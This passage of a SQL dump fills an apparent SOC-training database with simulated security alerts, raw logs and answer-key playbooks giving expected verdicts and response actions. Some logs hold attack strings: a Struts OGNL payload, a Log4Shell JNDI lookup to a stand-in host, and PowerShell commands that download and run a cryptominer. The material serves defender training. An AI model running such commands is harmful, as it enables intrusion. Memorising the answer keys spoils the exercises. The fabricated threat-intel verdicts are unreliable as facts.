address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address used for lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"suspicious\",\"details\":\"User credentials may have been compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by FIN7.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"credential_dump.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Filename associated with credential dumping tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (575, 'Data Exfiltration of Credit Card Information', 'high', 'Data Loss Prevention (DLP) logs', 'In the final stage, attackers exfiltrated credit card data via an unauthorized FTP transfer to an external IP address, preparing to monetize the information through underground channels.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:23:54Z\",\"event_id\":\"dlp-20231025-142354\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"21\",\"protocol\":\"FTP\",\"username\":\"compromised_user\",\"exfiltrated_files\":[\"credit_card_data.csv\"],\"md5_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"allowed\",\"alert\":\"Credit card data exfiltration detected\"}', '2026-01-08 22:01:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external dns\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used for data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"credit_card_data.csv\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive credit card information\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Hash of exfiltrated credit card data file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Account used for unauthorized access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (576, 'Suspicious HTTP Request Detected', 'high', 'Web Server Logs', 'A crafted HTTP request aimed at exploiting the Apache Struts vulnerability was detected. This attack attempts to gain initial access to the server by exploiting CVE-2017-5638.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:54Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"http_method\":\"GET\",\"url\":\"/struts2-showcase/index.action\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"payload\":\"${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'X-Exploit-Test\',\'Success\'))}\",\"response_code\":200,\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Empty file hash often used for testing or malicious purposes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (577, 'Unusual Command Execution Observed', 'high', 'Application Logs', 'Post-exploitation activity detected. An attacker executed a series of suspicious commands to establish control over the server. The commands are indicative of an attempt to further compromise the system by downloading additional malicious payloads.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"log_source\":\"application_log\",\"event_type\":\"command_execution\",\"user\":\"compromised_user\",\"source_ip\":\"192.168.1.105\",\"command\":\"powershell -exec bypass -File C:\\\\Users\\\\Public\\\\malicious.ps1\",\"malicious_file\":\"C:\\\\Users\\\\Public\\\\malicious.ps1\",\"attacker_ip\":\"198.51.100.23\",\"hash\":\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\",\"additional_info\":\"Command executed with elevated privileges\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2a4d7f5b8a9db7c9e30c1e4f2b1a5d4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known malware variant\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (578, 'Web Shell Detected in Server Directory', 'high', 'File Integrity Monitoring', 'A web shell was detected in the server directory, indicating an attempt to maintain persistent access to the compromised system. The file integrity monitoring system flagged an unauthorized file upload, which was later identified as a web shell. The immediate threat involves potential unauthorized control over the server.', 'Persistence', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"event_type\":\"file_change\",\"host_ip\":\"192.168.1.10\",\"file_path\":\"/var/www/html/shell.php\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"webadmin\",\"source_ip\":\"203.0.113.45\",\"action\":\"upload\",\"status\":\"success\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a common web shell\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"shell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of known web shells\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (579, 'Unexpected Outbound Traffic Spike', 'high', 'Network Traffic Analysis', 'Detected a significant spike in outbound network traffic from internal systems to an external IP associated with known malicious activity. The data being exfiltrated includes sensitive files.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:07Z\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"port\":443,\"bytes_sent\":10485760,\"filename\":\"confidential_data.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"process\":\"data_exfil.exe\",\"url\":\"https://malicious-c2-server.com/upload\",\"indicator_type\":\"malware\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 server.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Policies\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://malicious-c2-server.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation\",\"verdict\":\"malicious\",\"details\":\"URL linked to malicious C2 activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (580, 'Unauthorized User Account Activity', 'high', 'User Authentication Logs', 'An attacker is using compromised credentials to move laterally across the network, attempting to access additional sensitive data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:12:55Z\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"logon_type\":\"3\",\"logon_process\":\"NtLmSsp\",\"target_domain\":\"INTERNALCORP\",\"target_username\":\"jdoe\",\"logon_guid\":\"{3E7EAB11-4C7A-4D7D-BB8D-ED7BE3AB1A8A}\",\"source_port\":\"52435\",\"status\":\"Success\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"additional_info\":{\"filename\":\"compromised_document.docx\"}}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a corporate server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account, potential credential compromise\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used in lateral movement\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'intermediate', 'NULL', 1, 0, NULL), (581, 'Anomalous File Access Patterns', 'medium', 'File Access Logs', 'During routine monitoring, anomalous access patterns were detected on the file server. An external IP address was observed accessing multiple files containing sensitive information, potentially as a reconnaissance activity to identify valuable data for exfiltration.', 'Reconnaissance', 'T1592 - Gather Victim Host Information', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:25:37Z\",\"event_type\":\"file_access\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\",\"file_accessed\":[\"/finance/2023_budgets.xlsx\",\"/hr/employee_records.docx\",\"/legal/contracts/nda.pdf\"],\"file_hash\":[\"5f4dcc3b5aa765d61d8327deb882cf99\",\"098f6bcd4621d373cade4e832627b4f6\",\"e99a18c428cb38d5f260853678922e03\"],\"access_method\":\"smb\",\"action\":\"read\"}', '2026-01-08 22:06:19', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known reconnaissance activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/finance/2023_budgets.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive financial document accessed\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/hr/employee_records.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive HR document accessed\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"/legal/contracts/nda.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive legal document accessed\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (582, 'DNS Tunneling Suspected', 'high', 'DNS Query Logs', 'A DNS tunneling technique has been detected, indicating potential command and control activities. The attacker is using DNS queries to maintain communication with compromised systems.', 'Command and Control', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:07Z\",\"source_ip\":\"10.2.3.15\",\"destination_ip\":\"203.0.113.45\",\"queried_domain\":\"malicious.example.com\",\"dns_query_type\":\"TXT\",\"dns_response\":\"d41d8cd98f00b204e9800998ecf8427e\",\"internal_host\":\"compromised-host.local\",\"username\":\"jdoe\",\"unique_transaction_id\":\"1234567890abcdef\",\"detected_hash\":\"e99a18c428cb38d5f260853678922e03\",\"detected_filename\":\"dns_tunnel_tool.exe\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP used by APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"DNS Threat List\",\"verdict\":\"malicious\",\"details\":\"Domain associated with DNS tunneling activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known DNS tunneling tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"dns_tunnel_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection System\",\"verdict\":\"malicious\",\"details\":\"File detected as DNS tunneling executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (583, 'Encrypted Traffic Anomaly', 'high', 'SSL/TLS Traffic Inspection', 'Anomalous encrypted traffic was detected, indicating potential data exfiltration activities. The attacker is leveraging SSL/TLS channels to evade detection.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:23:45Z\",\"source_ip\":\"192.168.1.22\",\"destination_ip\":\"203.0.113.45\",\"ssl_subject\":\"CN=malicious-actor.com\",\"ssl_issuer\":\"CN=Let\'s Encrypt Authority X3\",\"data_volume\":\"5GB\",\"file_hash\":\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\",\"filename\":\"encrypted_payload.bin\",\"user\":\"jdoe\",\"action\":\"data_exfiltration\",\"protocol\":\"TLSv1.2\",\"alert_id\":\"EXFIL-2023-0008\",\"user_agent\":\"curl/7.68.0\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT data exfiltration tools.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encrypted_payload.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file detected during traffic inspection.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User is registered and active within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (584, 'Privileged Account Escalation Attempt', 'high', 'Privilege Access Management Logs', 'An attempt was detected where an attacker tried to escalate privileges to access restricted areas of the network and sensitive data. This is an intermediate level attempt at privilege escalation.', 'Privilege Escalation', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"event_id\":4625,\"event_type\":\"Audit Failure\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.2.15\",\"username\":\"john_doe\",\"domain\":\"CORP\",\"logon_type\":10,\"status\":\"0xC000006A\",\"sub_status\":\"0xC0000064\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"attempted_action\":\"Privilege Escalation\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal machine targeted for privilege escalation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Existing user attempting unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (585, 'Detected Data Anomalies in Backup Systems', 'high', 'Backup System Logs', 'Anomalous data modification detected in backup systems, indicating potential tampering activity aimed at covering tracks post data exfiltration. Changes were made to the backup files shortly after unauthorized access was recorded. Observations indicate the presence of malicious IPs and altered backup files.', 'Impact', 'T1485 - Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:15:27Z\",\"event_id\":\"4672\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"username\":\"backup_admin\",\"action\":\"modify\",\"file_modified\":\"/backup/weekly-full/2023-10-14.bak\",\"hash_before\":\"5d41402abc4b2a76b9719d911017c592\",\"hash_after\":\"6dcd4ce23d88e2ee9568ba546c007c63\",\"anomalies_detected\":true,\"related_malware\":\"APT29\",\"severity\":\"high\"}', '2026-01-08 22:06:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in backup operations.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/backup/weekly-full/2023-10-14.bak\",\"is_critical\":true,\"osint_result\":{\"source\":\"Backup Logs\",\"verdict\":\"suspicious\",\"details\":\"Backup file modified during unauthorized access window.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"Backup Integrity Check\",\"verdict\":\"clean\",\"details\":\"Original hash of the backup file before modification.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"6dcd4ce23d88e2ee9568ba546c007c63\",\"is_critical\":true,\"osint_result\":{\"source\":\"Backup Integrity Check\",\"verdict\":\"malicious\",\"details\":\"Modified hash indicating tampering with the backup file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (586, 'Initial Access: JNDI Injection Detected', 'critical', 'Web Application Firewall Logs', 'Anomalous traffic patterns have been identified which indicate a JNDI injection attempt targeting a critical Java-based application. The attempt is likely leveraging the Log4Shell vulnerability for initial access.', 'Exploit', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.75\",\"request_uri\":\"/vulnerable-endpoint\",\"http_method\":\"GET\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"referrer\":\"http://example.com/malicious-page\",\"jndi_string\":\"ldap://203.0.113.45:1389/Exploit\",\"malicious_indicator\":\"exploit.jar\",\"transaction_id\":\"abc123def456ghi789\",\"status_code\":200}', '2026-01-08 22:09:09', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exploitation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Critical Java-based application server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"exploit.jar\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Filename associated with Log4Shell exploitation\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (587, 'Execution: Cryptominer Deployment Identified', 'high', 'Endpoint Detection and Response (EDR) Logs', 'The EDR system identified the execution of a known cryptomining payload. The attacker utilized their access to deploy the cryptominer \'xmrig.exe\' on the target system, exploiting system resources for illicit mining activities. The activity was flagged due to anomalous process creation and outbound connections to a known mining pool.', 'Malware', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:52:45Z\",\"event_type\":\"process_creation\",\"host_ip\":\"192.168.1.15\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -Command \\\"Invoke-WebRequest -Uri http://maliciousdomain.com/malware/xmrig.exe -OutFile C:\\\\Users\\\\Public\\\\xmrig.exe; Start-Process C:\\\\Users\\\\Public\\\\xmrig.exe\\\"\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"username\":\"compromised_user\",\"file_name\":\"xmrig.exe\",\"external_ip\":\"198.51.100.23\"}', '2026-01-08 22:09:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known cryptomining pool IP.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a cryptominer executable.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"xmrig.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Commonly used name for cryptomining software.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account showing anomalous behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (588, 